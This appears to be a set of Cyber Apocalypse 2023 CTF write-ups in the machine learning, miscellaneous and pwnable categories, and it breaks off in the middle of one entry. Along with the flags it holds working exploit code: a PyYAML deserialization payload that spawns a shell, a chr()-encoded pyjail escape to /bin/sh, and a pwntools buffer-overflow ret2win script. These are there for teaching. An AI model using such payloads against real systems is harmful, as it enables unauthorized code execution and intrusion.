import tensorflow as tf
from tensorflow import keras

# Load the model from the HDF5 file
model = keras.models.load_model('alien.h5')

# Display the model's summary
model.summary()

We noticed a few strings in the layer names that seemed to be part of the flag. By combining these strings,decoded it from base64 we were able to construct the flag.

Flag is: HTB{th3s3_4l13nS_4r3_s00000_b4s1c}

Last Hope

Given zip: Get it here!
Description: The quantum data came back and analyzed. DISASTER! Our best scientists all agree: Unfortunately our species and our whole culture are about to be eliminated. Due to abnormal behavior of the black hole’s singularity our planet is about to get swallowed. Project “ONESHOT” is our last hope…
Category: Machine Learning

In this challenge, we are given a file containing OpenQASM 2.0 code, which represents a quantum circuit. Our goal is to execute the circuit and extract the flag, which is encoded in the most frequent bitstring resulting from the measurement of the quantum circuit.

Here’s a brief write-up of the steps taken to solve this challenge:

We start by reading the OpenQASM code from the file named ‘quantum_artifact.qasm’ and store it as a string.
Next, we use Qiskit, a Python library for quantum computing, to convert the OpenQASM code into a QuantumCircuit object.
We set up a quantum simulator using Qiskit’s Aer module, which allows us to simulate quantum circuits on classical computers.
We transpile the circuit, optimizing it for the simulator.
We execute the transpiled circuit on the simulator with 1024 shots, meaning the circuit is run 1024 times, and store the result.
From the result, we extract the counts, which is a dictionary containing the frequency of each bitstring.
We iterate through the counts and find the most frequent bitstring, which is the binary representation of our flag.
We convert the most frequent bitstring to a text string by splitting it into groups of 8 bits (1 byte) and using the int() and chr() functions to convert each byte to its corresponding character.
Finally, we print the decoded flag.

The provided script follows these steps and successfully extracts the flag from the given quantum circuit.

from qiskit import QuantumCircuit, Aer, transpile

# OpenQASM 2.0 code
with open('quantum_artifact.qasm', 'r') as f:
 openqasm_code = f.read()


# Load the OpenQASM code into a Qiskit QuantumCircuit object
qc = QuantumCircuit.from_qasm_str(openqasm_code)

# Set up a quantum simulator
simulator = Aer.get_backend('qasm_simulator')


# Transpile the circuit
transpiled_circuit = transpile(qc, simulator)

# Run the circuit on the simulator
result = simulator.run(transpiled_circuit, shots=1024).result()


# Get the counts from the result
counts = result.get_counts()

# Find the most frequent bitstring
max_count = 0
most_frequent_bitstring = ""

for bitstring, count in counts.items():
 if count > max_count:
 max_count = count
 most_frequent_bitstring = bitstring

binary_str=most_frequent_bitstring
byte_array = [binary_str[i:i+8] for i in range(0, len(binary_str), 8)]

# Convert each byte to its corresponding character using the int() and chr() functions
flag = ''.join([chr(int(byte, 2)) for byte in byte_array])

print("Flag:", flag)

Flag is: HTB{a_gl1mps3_0f_h0p3}

On The Rescue

Given zip: Get it here!
Description: The archeologist finally found the ancient vessel. Utilizing the alien technology he managed to breach in the central computational unit and learn the reason behind their visit on Earth millions of years ago. A message appeared. It was all a desperate plan for the survival of their kind.
Category: Machine Learning

The challenge presented a simple Bigram Language Model, which is a basic character-level language model that predicts the next character based on the current character. We were given the model’s architecture architecture.py and a pre-trained model file bigram_model.pt. The objective was to generate a text that could help us understand the aliens’ message.The solve script is provided below:

import torch
from architecture import BigramLanguageModel, vocab

def text_to_idx(text):
 return torch.tensor([vocab.index(c) for c in text])

def idx_to_text(idx):
 return ''.join([vocab[i] for i in idx])

def generate_text(model, initial_text, length):
 generated_text = initial_text
 for _ in range(length):
 input_idx = text_to_idx(generated_text[-1])
 input_idx = input_idx.unsqueeze(0).to(model.device)
 logits = model(input_idx)
 next_token_idx = torch.argmax(logits, dim=-1).item()
 generated_text += vocab[next_token_idx]
 return generated_text

# Load the pretrained model
model_path = "bigram_model.pt"
model = BigramLanguageModel(len(vocab))
model.load_state_dict(torch.load(model_path))
model.eval()
model.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model.to(model.device)

# Generate text
initial_text = "A"
length = 100
generated_text = generate_text(model, initial_text, length)
print(generated_text)

To solve the challenge, we first created utility functions to convert text to index and index to text. Then, we wrote a function generate_text that takes the model, an initial text, and the desired length of the generated text. The function generates text by iteratively feeding the last character of the generated text to the model and appending the predicted character to the generated text.

We loaded the pre-trained model and moved it to the appropriate device (GPU or CPU). Finally, we generated text using the generate_text function with an initial text and a specified length, and printed the resulting text.

Flag is: HTB{Pr0t3c7_L1fe}

Cyber Apocalypse 2023: The Cursed Mission - Miscellaneous

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Persistence

Description: Thousands of years ago, sending a GET request to /flag would grant immense power and wisdom. Now it’s broken and usually returns random data, but keep trying, and you might get lucky… Legends say it works once every 1000 tries.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Very Easy

We are given a website to work with. Initially, connection to the website would result in “404 Not Found”. I then went to read the descriptions, and from it, I got to know that we should send at least 1000 GET requests to /flag to maybe get the flag.

I used this below Python script to automate the task.

import requests

url = "http://64.227.41.83:30380/flag"
for i in range(10000):
 response = requests.get(url)
 content = response.content
 if b'HTB{' in content:
 print(content)
 break

After a short wait, we got the flag.

Flag is: HTB{y0u_h4v3_p0w3rfuL_sCr1pt1ng_ab1lit13S!}

Hijack

Description: The security of the alien spacecrafts did not prove very robust, and you have gained access to an interface allowing you to upload a new configuration to their ship’s Thermal Control System. Can you take advantage of the situation without raising any suspicion?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

Let’s try to connect to the challenge instance.

And let’s try to test out those options.

ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcxNScsIGF1dG9fY2FsaWJyYXRpb246ICdvbicsCiAgcHJvcHVsc2lvbl90ZW1wOiAnMzQzNCcsIHNvbGFyX2FycmF5X3RlbXA6ICcxMicsIHVuaXRzOiBmfQo=

The function in question generates a base64 encoded string representing a serialized object. To provide some context, serialization is the process of storing an object, such as an array or class, in a database for later retrieval. When the application needs to access the object, it unserializes it, or loads it from the database using a function. This can improve the efficiency of Object-Oriented Programming.

It is important to note, however, that serialized objects should not be vulnerable to manipulation by users. If a user creates a malicious object, it could execute unwanted code. This challenge illustrates this point by presenting us with a serialized object and its corresponding base64 encoding. This is just one example of how serialized objects can be used, and it is essential to be aware of their potential risks.

Let’s take a look at the next options. The application is requesting a base64 encoded string of a serialized object.

Upon examining the serialized object provided by the application, I have determined that it is a YAML-formatted Python serialized object. This article serves as an excellent illustration of how attackers can leverage YAML-based exploits to execute arbitrary code.

Here is the script to generate a serialized object.

import yaml
import os
import base64
class Test(object):
 def __reduce__(self):
 return (os.system, ('sh',))
serialized_data = yaml.dump(Test()) # serializing data
print(base64.b64encode(serialized_data.encode()).decode())

Let’s grab the result and throw it to the application.

Flag is: HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}

Restricted

Given file: Get it here!
Description: You ’re still trying to collect information for your research on the alien relic. Scientists contained the memories of ancient egyptian mummies into small chips, where they could store and replay them at will. Many of these mummies were part of the battle against the aliens and you suspect their memories may reveal hints to the location of the relic and the underground vessels. You managed to get your hands on one of these chips but after you connected to it, any attempt to access its internal data proved futile. The software containing all these memories seems to be running on a restricted environment which limits your access. Can you find a way to escape the restricted environment?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

We are provided with a server and it’s source. From the source, we know that it is a SSH server.

One thing particular about this server is that, if the username is restricted, we will not need to provide a password to authenticate, but the user will be in restricted shell mode.

To cope with this, we can use a trick called SSH self loop-back, which means we initiate a SSH connection inside a SSH, since restricted shell doesn’t prevent us from using SSH commands.

First, we connect to the SSH server using the username restricted.

From the source, we also know that the exposed port is 1337. Then, we can use SSH self loop-back to have the permission to use cat, since we also know that flag.txt is changed to flag_* (with * represents some random bytes) and lies in plainsight.

Flag is: HTB{r35tr1ct10n5_4r3_p0w3r1355}

Remote computation

Description: The alien species use remote machines for all their computation needs. Pandora managed to hack into one, but broke its functionality in the process. Incoming computation requests need to be calculated and answered rapidly, in order to not alarm the aliens and ultimately pivot to other parts of their network. Not all requests are valid though, and appropriate error messages need to be sent depending on the type of error. Can you buy us some time by correctly responding to the next 500 requests?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

The program asked us to calculate 500 math expressions with the following conditions.

Results
---
All results are rounded
to 2 digits after the point.
ex. 9.5752 -> 9.58

Error Codes
---
* Divide by 0:
This may be alien technology,
but dividing by zero is still an error!
Expected response: DIV0_ERR

* Syntax Error
Invalid expressions due syntax errors.
ex. 3 +* 4 = ?
Expected response: SYNTAX_ERR

* Memory Error
The remote machine is blazingly fast,
but its architecture cannot represent any result
outside the range -1337.00 <= RESULT <= 1337.00
Expected response: MEM_ERR

At first I tried to round the numbers the mathematical way but then I realised the remote server was using the round() function of python the whole time.

So yeah here’s the solve script.

from decimal import Decimal, ROUND_HALF_UP, ROUND_HALF_DOWN
from pwn import *

io = remote('144.126.196.198', 30843)
print(io.recvuntil(b'>'))
io.sendline(b'1')
print(io.recvuntil(b'...'))
for _ in range(500):
 node = io.recvuntil(b']')
 if b'!' in node:
 log.info("BRUH!!!!!!!!!!!") # In case something goes wrong (and it did)
 break
 print(node)
 io.recv(2)
 equation = io.recvuntil(b'=')[:-1].decode()
 print(equation, end='=')
 print(io.recvuntil(b'>'))
 try:
 cal = eval(equation)
 if cal < -1337 or cal > 1337:
 log.info('MEM_ERR')
 io.sendline(b"MEM_ERR")
 else:
 res = round(cal, 2)
 # if cal >= 0:
 # res = Decimal(str(cal)).quantize(Decimal('1.00'), rounding=ROUND_HALF_UP)
 # else:
 # res = Decimal(str(cal)).quantize(Decimal('1.00'), rounding=ROUND_HALF_DOWN)
 log.info('SUCCESS WITH RESULT: {}'.format(str(res)))
 io.sendline(str(res).encode())
 except SyntaxError:
 log.info('SYNTAX_ERR')
 io.sendline(b"SYNTAX_ERR")
 except ZeroDivisionError:
 log.info('DIV0_ERR')
 io.sendline(b"DIV0_ERR")
io.interactive()

Flag is: HTB{d1v1d3_bY_Z3r0_3rr0r}

Janken

Given file: Get it here!
Description: As you approach an ancient tomb, you’re met with a wise guru who guards its entrance. In order to proceed, he challenges you to a game of Janken, a variation of rock paper scissors with a unique twist. But there’s a catch: you must win 100 rounds in a row to pass. Fail to do so, and you’ll be denied entry.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Easy

There are 2 noticable functions called within main() which is game() and get_prize().

The get_prize() function simply gives us the flag so we won’t go too deep into it. But in order for this function to be called. We have to win 100 games of rock, paper, scissors. A.K.A. the game() function.

Having analyzed it, we got the following code:

int game()
{
 unsigned int v0; // eax
 size_t i; // [rsp+0h] [rbp-80h]
 __int64 v3; // [rsp+8h] [rbp-78h]
 __int64 v4[4]; // [rsp+10h] [rbp-70h]
 char *needle[4]; // [rsp+30h] [rbp-50h]
 __int64 buf[6]; // [rsp+50h] [rbp-30h] BYREF

 buf[5] = __readfsqword(0x28u);
 v0 = time(0LL);
 srand(v0);
 v3 = rand() % 3;
 v4[0] = (__int64)"rock";
 v4[1] = (__int64)"scissors";
 v4[2] = (__int64)"paper";
 memset(buf, 0, 32);
 needle[0] = "paper";
 needle[1] = "rock";
 needle[2] = "scissors";
 fwrite(&unk_2540, 1uLL, 0x33uLL, stdout);
 read(0, buf, 31uLL);
 fprintf(
 stdout,
 "\n[!] Guru's choice: %s%s%s\n[!] Your choice: %s%s%s",
 "\x1B[1;31m",
 (const char *)v4[v3],
 "\x1B[1;36m",
 "\x1B[1;32m",
 (const char *)buf,
 "\x1B[1;36m");
 for ( i = 0LL; i < strlen((const char *)buf); ++i )
 {
 if ( ((*__ctype_b_loc())[*((char *)buf + i)] & ' \0') != 0 )
 {
 *((_BYTE *)buf + i) = 0;
 break;
 }
 }
 if ( !strstr((const char *)buf, needle[v3]) )
 {
 fprintf(stdout, "%s\n[-] You lost the game..\n\n", "\x1B[1;31m");
 exit(22);
 }
 return fprintf(stdout, "\n%s[+] You won this round! Congrats!\n%s", "\x1B[1;32m", "\x1B[1;36m");
}

We noticed that the program (Guru) chooses a random number from 0 to 2, which is rock, paper, scissors accordingly. It then checks if our input contains the string that can win against its choice using the strstr() function.

In other words, if Guru chooses rock, then if our input contain the string paper, we win.

We can exploit the strstr() by spamming rockpaperscissors 100 times or write a script to do it for us.

from pwn import *

io = remote('68.183.37.122', 32161)
print(io.recv())
io.sendline(b'1')
for _ in range(100):
 print(io.recv())
 io.sendline(b'rockpaperscissors')
io.interactive()

Flag is: HTB{r0ck_p4p3R_5tr5tr_l0g1c_buG}

nehebkaus trap

Description: In search of the ancient relic, you go looking for the Pharaoh’s tomb inside the pyramids. A giant granite block falls and blocks your exit, and the walls start closing in! You are trapped. Can you make it out alive and continue your quest?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Medium

A classic pyjail challenge with no source code. It filtered out some special characters like ' " _ . / so we couldn’t directly execute any code.

One way to bypass this is to break down the string of code we want to execute into individual characters and concatenate them together using the + operator.

We can bypass the ' and " filter simply by using chr(hex-value-of-the-ascii-character) to make the character we want.

For this I used eval("__import__('os').system('/bin/sh')"). The payload for this is:

eval(chr(0x5f)+chr(0x5f)+chr(0x69)+chr(0x6d)+chr(0x70)+chr(0x6f)+chr(0x72)+chr(0x74)+chr(0x5f)+chr(0x5f)+chr(0x28)+chr(0x27)+chr(0x6f)+chr(0x73)+chr(0x27)+chr(0x29)+chr(0x2e)+chr(0x73)+chr(0x79)+chr(0x73)+chr(0x74)+chr(0x65)+chr(0x6d)+chr(0x28)+chr(0x27)+chr(0x2f)+chr(0x62)+chr(0x69)+chr(0x6e)+chr(0x2f)+chr(0x73)+chr(0x68)+chr(0x27)+chr(0x29))

Now with all the pieces together, let’s send our exploit.

Flag is: HTB{y0u_d3f34t3d_th3_sn4k3_g0d!}

The Chasm’s Crossing Conundrum

Description: As you and your trusty team of local pyramid experts stand at the precipice of the chasm, you catch a glimpse of the otherworldly relic glowing tantalizingly in the distance. But the final obstacle looms ahead - a narrow, unstable bridge that threatens to send you all tumbling into the depths below. It won’t hold all of you at once. Time is running out, and the charge on your flashlight is dwindling. The chasm seems to be closing in, as if it’s trying to swallow you whole. With each step, you feel the weight of the task at hand. The fate of your team, and perhaps even the world, rests on your shoulders. Can you summon the courage and skill to make it across in time, and claim the relic that lies just beyond your grasp?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Miscellaneous
Difficulty: Hard

Classic bridge and torch problem. Here’s the instruction of the game.

☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠
☠ ☠
☠ [*] The path ahead is treacherous. ☠
☠ [*] You have to find a viable strategy to get everyone across safely. ☠
☠ [*] The bridge can hold a maximum of two persons. ☠
☠ [*] The chasm lurks on either side of the bridge waiting for those ☠
☠ who think they can get across in total darkness. ☠
☠ [*] If two persons get across, one must come back with the flashlight. ☠
☠ [*] The flashlight has energy only for a limited amount of time. ☠
☠ [*] The time required for two persons to cross, is dictated by the slower. ☠
☠ [*] The answer must be given in crossing and returning pairs. For example, ☠
☠ [1,2],[2],... . This means that persons 1 and 2 cross and 2 gets back ☠
☠ with the flashlight so others can cross. ☠
☠ ☠
☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠ ☠

There’s only one optimal solution for every number of people. You can find it everywhere on the internet so I won’t write it here.

One thing I noticed that the program only has 3 cases which is 6, 7 or 8 people. So instead of writing the general solution, I solved each cases individually.

Here’s the script.

from pwn import *

# take second element for sort
def takeSecond(elem):
 return elem[1]

def man8(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[6][0]},{elem[7][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[4][0]},{elem[5][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[2][0]},{elem[3][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}]'
 return res.encode()

def man6(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[4][0]},{elem[5][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[2][0]},{elem[3][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}]'
 return res.encode()

def man7(elem):
 res = f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[5][0]},{elem[6][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[3][0]},{elem[4][0]}],[{elem[1][0]}],'
 res += f'[{elem[0][0]},{elem[1][0]}],[{elem[0][0]}],[{elem[0][0]},{elem[2][0]}]'
 return res.encode()

# list
person = []

io = remote('68.183.37.122', 31392)
io.recvuntil(b'> ')
io.sendline(b'2')
io.recvuntil(b'flashlight.\n\n')
while(1):
 per = io.recvline(keepends=False)
 if b'flashlight' in per:
 break
 per = per.decode().split()
 person.append((int(per[1]), int(per[4])))
person.sort(key=takeSecond)
if len(person)==8:
 ret = man8(person)
elif len(person)==7:
 ret = man7(person)
else:
 ret = man6(person)
print(ret)
io.recvuntil(b'> ')
io.sendline(ret)
io.interactive()

Flag is: HTB{4cro55_th3_br1dg3_4nd_th3_ch4sm_l13s_th3_tr34sur3}

Original Posts

From FazeCT

Cyber Apocalypse 2023: The Cursed Mission - Pwnable

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Initialise Connection

Description: In order to proceed, we need to start with the basics. Start an instance, connect to it via $ nc e.g. nc 127.0.0.1 1337 and send “1” to get the flag.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Very Easy

Just a sanity check challenge, do the same thing that is being stated in the description will grant you the flag.

Flag is: HTB{g3t_r34dy_f0r_s0m3_pwn}

Questionnaire

Given file: Get it here!
Description: It’s time to learn some things about binaries and basic c. Connect to a remote server and answer some questions to get the flag.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Very Easy

We are given a binary, a C file and a netcat server to answer some questions.

From the netcat, we are given some informations about the binary that we will going to work with.

When compiling C/C++ source code in Linux, an ELF (Executable and Linkable Format) file is created.
The flags added when compiling can affect the binary in various ways, like the protections.
Another thing affected can be the architecture and the way it's linked.

If the system in which the challenge is compiled is x86_64 and no flag is specified,
the ELF would be x86-64 / 64-bit. If it's compiled with a flag to indicate the system,
it can be x86 / 32-bit binary.

To reduce its size and make debugging more difficult, the binary can be stripped or not stripped.

Dynamic linking:

A pointer to the linked file is included in the executable, and the file contents are not included
at link time. These files are used when the program is run.

Static linking:

The code for all the routines called by your program becomes part of the executable file.

Stripped:

The binary does not contain debugging information.

Not Stripped:

The binary contains debugging information.

The most common protections in a binary are:

Canary: A random value that is generated, put on the stack, and checked before that function is
left again. If the canary value is not correct-has been changed or overwritten, the application will
immediately stop.

NX: Stands for non-executable segments, meaning we cannot write and execute code on the stack.

PIE: Stands for Position Independent Executable, which randomizes the base address of the binary
as it tells the loader which virtual address it should use.

RelRO: Stands for Relocation Read-Only. The headers of the binary are marked as read-only.

Run the 'file' command in the terminal and 'checksec' inside the debugger.

The output of 'file' command:

✗ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked,
interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5a83587fbda6ad7b1aeee2d59f027a882bf2a429,
for GNU/Linux 3.2.0, not stripped.

The output of 'checksec' command:

gef➤ checksec
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Partial

We are able to answer some first questions using these informations.

After answering these questions correctly, we are provided with more informations about the binary.

Great job so far! Now it's time to see some C code and a binary file.

In the pwn_questionnaire.zip there are two files:

1. test.c
2. test

The 'test.c' is the source code and 'test' is the output binary.

Let's start by analyzing the code.
First of all, let's focus on the '#include <stdio.h>' line.
It includes the 'stdio.h' header file to use some of the standard functions like 'printf()'.
The same principle applies for the '#include <stdlib.h>' line, for other functions like 'system()'.

Now, let's take a closer look at:

void main(){
 vuln();
}

By default, a binary file starts executing from the 'main()' function.

In this case, 'main()' only calls another function, 'vuln()'.
The function 'vuln()' has 3 lines.

void vuln(){
 char buffer[0x20] = {0};
 fprintf(stdout, "\nEnter payload here: ");
 fgets(buffer, 0x100, stdin);
}

The first line declares a 0x20-byte buffer of characters and fills it with zeros.
The second line calls 'fprintf()' to print a message to stdout.
Finally, the third line calls 'fgets()' to read 0x100 bytes from stdin and store them to the
aformentioned buffer.

Then, there is a custom 'gg()' function which calls the standard 'system()' function to print the
flag. This function is never called by default.

void gg(){
 system("cat flag.txt");
}

Run the 'man <function_name>' command to see the manual page of a standard function (e.g. man fgets).

We are also able to answer some next questions using these informations.

After answering these questions correctly, we are provided with MORE and MORE informations about the binary.

Excellent! Now it's time to talk about Buffer Overflows.

Buffer Overflow means there is a buffer of characters, integers or any other type of variables,
and someone inserts into this buffer more bytes than it can store.

If the user inserts more bytes than the buffer's size, they will be stored somewhere in the memory
after the address of the buffer, overwriting important addresses for the flow of the program.
This, in most cases, will make the program crash.

When a function is called, the program knows where to return because of the 'return address'. If the
player overwrites this address, they can redirect the flow of the program wherever they want.
To print a function's address, run 'p <function_name>' inside 'gdb'. (e.g. p main)

gef➤ p gg
$1 = {<text variable, no debug info>} 0x401176 <gg>

To perform a Buffer Overflow in the simplest way, we take these things into consideration.

1. Canary is disabled so it won't quit after the canary address is overwritten.
2. PIE is disabled so the addresses of the binary functions are not randomized and the user knows
 where to return after overwritting the return address.
3. There is a buffer with N size.
4. There is a function that reads to this buffer more than N bytes.

Run printf 'A%.0s' {1..30} | ./test to enter 30*"A" into the program.

Run the program manually with "./test" and insert 30*A, then 39, then 40 and see what happens.

We are able to answer some next questions using these informations.

For the above question, you can try out to see for yourself.

And there is our flag!

Flag is: HTB{th30ry_bef0r3_4cti0n}

Getting Started

Given file: Get it here!
Description: Get ready for the last guided challenge and your first real exploit. It’s time to show your hacking skills.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Very Easy

We are given a binary, a C file and a netcat server to work with.

Same with the above challenge, netcat tells us to fill in some questions.

Stack frame layout

| . | <- Higher addresses
| . |
|_____________|
| | <- 64 bytes
| Return addr |
|_____________|
| | <- 56 bytes
| RBP |
|_____________|
| | <- 48 bytes
| target |
|_____________|
| | <- 40 bytes
| alignment |
|_____________|
| | <- 32 bytes
| Buffer[31] |
|_____________|
| . |
| . |
|_____________|
| |
| Buffer[0] |
|_____________| <- Lower addresses


 [Addr] | [Value]
-------------------+-------------------
0x00007fff1ca33230 | 0x0000000000000000 <- Start of buffer
0x00007fff1ca33238 | 0x0000000000000000
0x00007fff1ca33240 | 0x0000000000000000
0x00007fff1ca33248 | 0x0000000000000000
0x00007fff1ca33250 | 0x6969696969696969 <- Dummy value for alignment
0x00007fff1ca33258 | 0x00000000deadbeef <- Target to change
0x00007fff1ca33260 | 0x000055cf39fcf800 <- Saved rbp
0x00007fff1ca33268 | 0x00007f62c548ac87 <- Saved return address
0x00007fff1ca33270 | 0x0000000000000001
0x00007fff1ca33278 | 0x00007fff1ca33348


After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:


 [Addr] | [Value]
-------------------+-------------------
0x00007fff1ca33230 | 0x0000000041414141 <- Start of buffer
0x00007fff1ca33238 | 0x0000000000000000
0x00007fff1ca33240 | 0x0000000000000000
0x00007fff1ca33248 | 0x0000000000000000
0x00007fff1ca33250 | 0x6969696969696969 <- Dummy value for alignment
0x00007fff1ca33258 | 0x00000000deadbeef <- Target to change
0x00007fff1ca33260 | 0x000055cf39fcf800 <- Saved rbp
0x00007fff1ca33268 | 0x00007f62c548ac87 <- Saved return address
0x00007fff1ca33270 | 0x0000000000000001
0x00007fff1ca33278 | 0x00007fff1ca33348


After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:


 [Addr] | [Value]
-------------------+-------------------
0x00007fff1ca33230 | 0x4242424241414141 <- Start of buffer
0x00007fff1ca33238 | 0x0000000000000000
0x00007fff1ca33240 | 0x0000000000000000
0x00007fff1ca33248 | 0x0000000000000000
0x00007fff1ca33250 | 0x6969696969696969 <- Dummy value for alignment
0x00007fff1ca33258 | 0x00000000deadbeef <- Target to change
0x00007fff1ca33260 | 0x000055cf39fcf800 <- Saved rbp
0x00007fff1ca33268 | 0x00007f62c548ac87 <- Saved return address
0x00007fff1ca33270 | 0x0000000000000001
0x00007fff1ca33278 | 0x00007fff1ca33348

From the netcat, we are provided with these informations.

We can answer the question by looking at the informations given, where we have to overwrite the alignment address and the “target’s” 0xdeadbeef value.

From the stack layout given above, we can see that to fully overwrite, we need at least 40 bytes input (assume that we use Linux terminal because there will be a \x00 overwrite at the right of the “target’s” 0xdeadbeef value) which will look like this.

I don’t know why it prints out "[-] You failed!" though…

Flag is: HTB{b0f_s33m5_3z_r1ght?}

Labyrinth

Given file: Get it here!
Description: You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Easy

Examine the binary with command checksec

[*] '~/pwn_labyrinth/challenge/labyrinth'
 Arch: amd64-64-little
 RELRO: Full RELRO
 Stack: No canary found
 NX: NX enabled
 PIE: No PIE (0x400000)
 RUNPATH: b'./glibc/'

Use IDA Pro to analyze, we obtain the following pseudocode for function escape_plan

int escape_plan()
{
 char buf; // [rsp+Bh] [rbp-5h] BYREF
 int fd; // [rsp+Ch] [rbp-4h]

 putchar(10);
 fwrite(&unk_402018, 1uLL, 0x1F0uLL, _bss_start);
 fprintf(
 _bss_start,
 "\n%sCongratulations on escaping! Here is a sacred spell to help you continue your journey: %s\n",
 "\x1B[1;32m",
 "\x1B[0m");
 fd = open("./flag.txt", 0);
 if ( fd < 0 )
 {
 perror("\nError opening flag.txt, please contact an Administrator.\n\n");
 exit(1);
 }
 while ( read(fd, &buf, 1uLL) > 0 )
 fputc(buf, _bss_start);
 return close(fd);
}

Our goal is to be able to execute this function, now examine the main function

int __cdecl main(int argc, const char **argv, const char **envp)
{
 char v4[8]; // [rsp+0h] [rbp-30h] BYREF
 __int64 v5; // [rsp+8h] [rbp-28h]
 __int64 v6; // [rsp+10h] [rbp-20h]
 __int64 v7; // [rsp+18h] [rbp-18h]
 char *s; // [rsp+20h] [rbp-10h]
 unsigned __int64 i; // [rsp+28h] [rbp-8h]

 setup(argc, argv, envp);
 banner();
 *(_QWORD *)v4 = 0LL;
 v5 = 0LL;
 v6 = 0LL;
 v7 = 0LL;
 fwrite("\nSelect door: \n\n", 1uLL, 0x10uLL, _bss_start);
 for ( i = 1LL; i <= 0x64; ++i )
 {
 if ( i > 9 )
 {
 if ( i > 0x63 )
 fprintf(_bss_start, "Door: %d ", i);
 else
 fprintf(_bss_start, "Door: 0%d ", i);
 }
 else
 {
 fprintf(_bss_start, "Door: 00%d ", i);
 }
 if ( !(i % 0xA) && i )
 putchar(10);
 }
 fwrite("\n>> ", 1uLL, 4uLL, _bss_start);
 s = (char *)malloc(0x10uLL);
 fgets(s, 5, stdin);
 if ( !strncmp(s, "69", 2uLL) || !strncmp(s, "069", 3uLL) )
 {
 fwrite(
 "\n"
 "You are heading to open the door but you suddenly see something on the wall:\n"
 "\n"
 "\"Fly like a bird and be free!\"\n"
 "\n"
 "Would you like to change the door you chose?\n"
 "\n"
 ">> ",
 1uLL,
 0xA0uLL,
 _bss_start);
 fgets(v4, 68, stdin);
 }
 fprintf(_bss_start, "\n%s[-] YOU FAILED TO ESCAPE!\n\n", "\x1B[1;31m");
 return 0;
}

There is a buffer overflow associate with this line of code fgets(v4, 68, stdin); because v4 was declared char v4[8]; but we are allowed to input up to 68 bytes and we need to input ‘69’ at first. Our attack plan will be overwrite the return address with the address of function escape_plan. IDA also provides us stack offset of variable v4 which is [rbp-30h], so we can calculate the correct padding which is equal 0x30 + 8 = 0x38 = 56. The stack frame layout will be

|_______________|
| |
| "A"*56 |
| |
|_______________|
| |
|ret instruction| # padding ret because of movaps instruction
|_______________|
| |
| escape_plan |
|_______________|
| . |

We can use ROPgadget to find the address of instruction ret

$ ROPgadget --binary labyrinth | grep "ret"
0x0000000000401016 : ret

We yield the final exploit

#!/usr/bin/env python3

from pwn import *

exe = ELF("./labyrinth")

context.binary = exe

p = remote("167.71.143.44",31869)
# p = process('./labyrinth')

p.recvuntil(b'>> ')
p.sendline(b'69')

p.recvuntil(b'>> ')
ret = 0x0000000000401016
payload = b'A'*56 + p64(ret)+ p64(exe.sym['escape_plan'])
p.sendline(payload)
p.interactive()

Flag is: HTB{3sc4p3_fr0m_4b0v3}

Pandora’s Box

Given file: Get it here!
Description: You stumbled upon one of Pandora’s mythical boxes. Would you be curious enough to open it and see what’s inside, or would you opt to give it to your team for analysis?
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Binary Exploitation/Pwnable
Difficulty: Easy

The challenge greeted us with a binary following a libc.so.6 and a ld-linux-x86-64.so.2.

Decompile the binary using IDA Pro, we easily found the vulnerability lied within the box() fucntion.

size_t box()
{
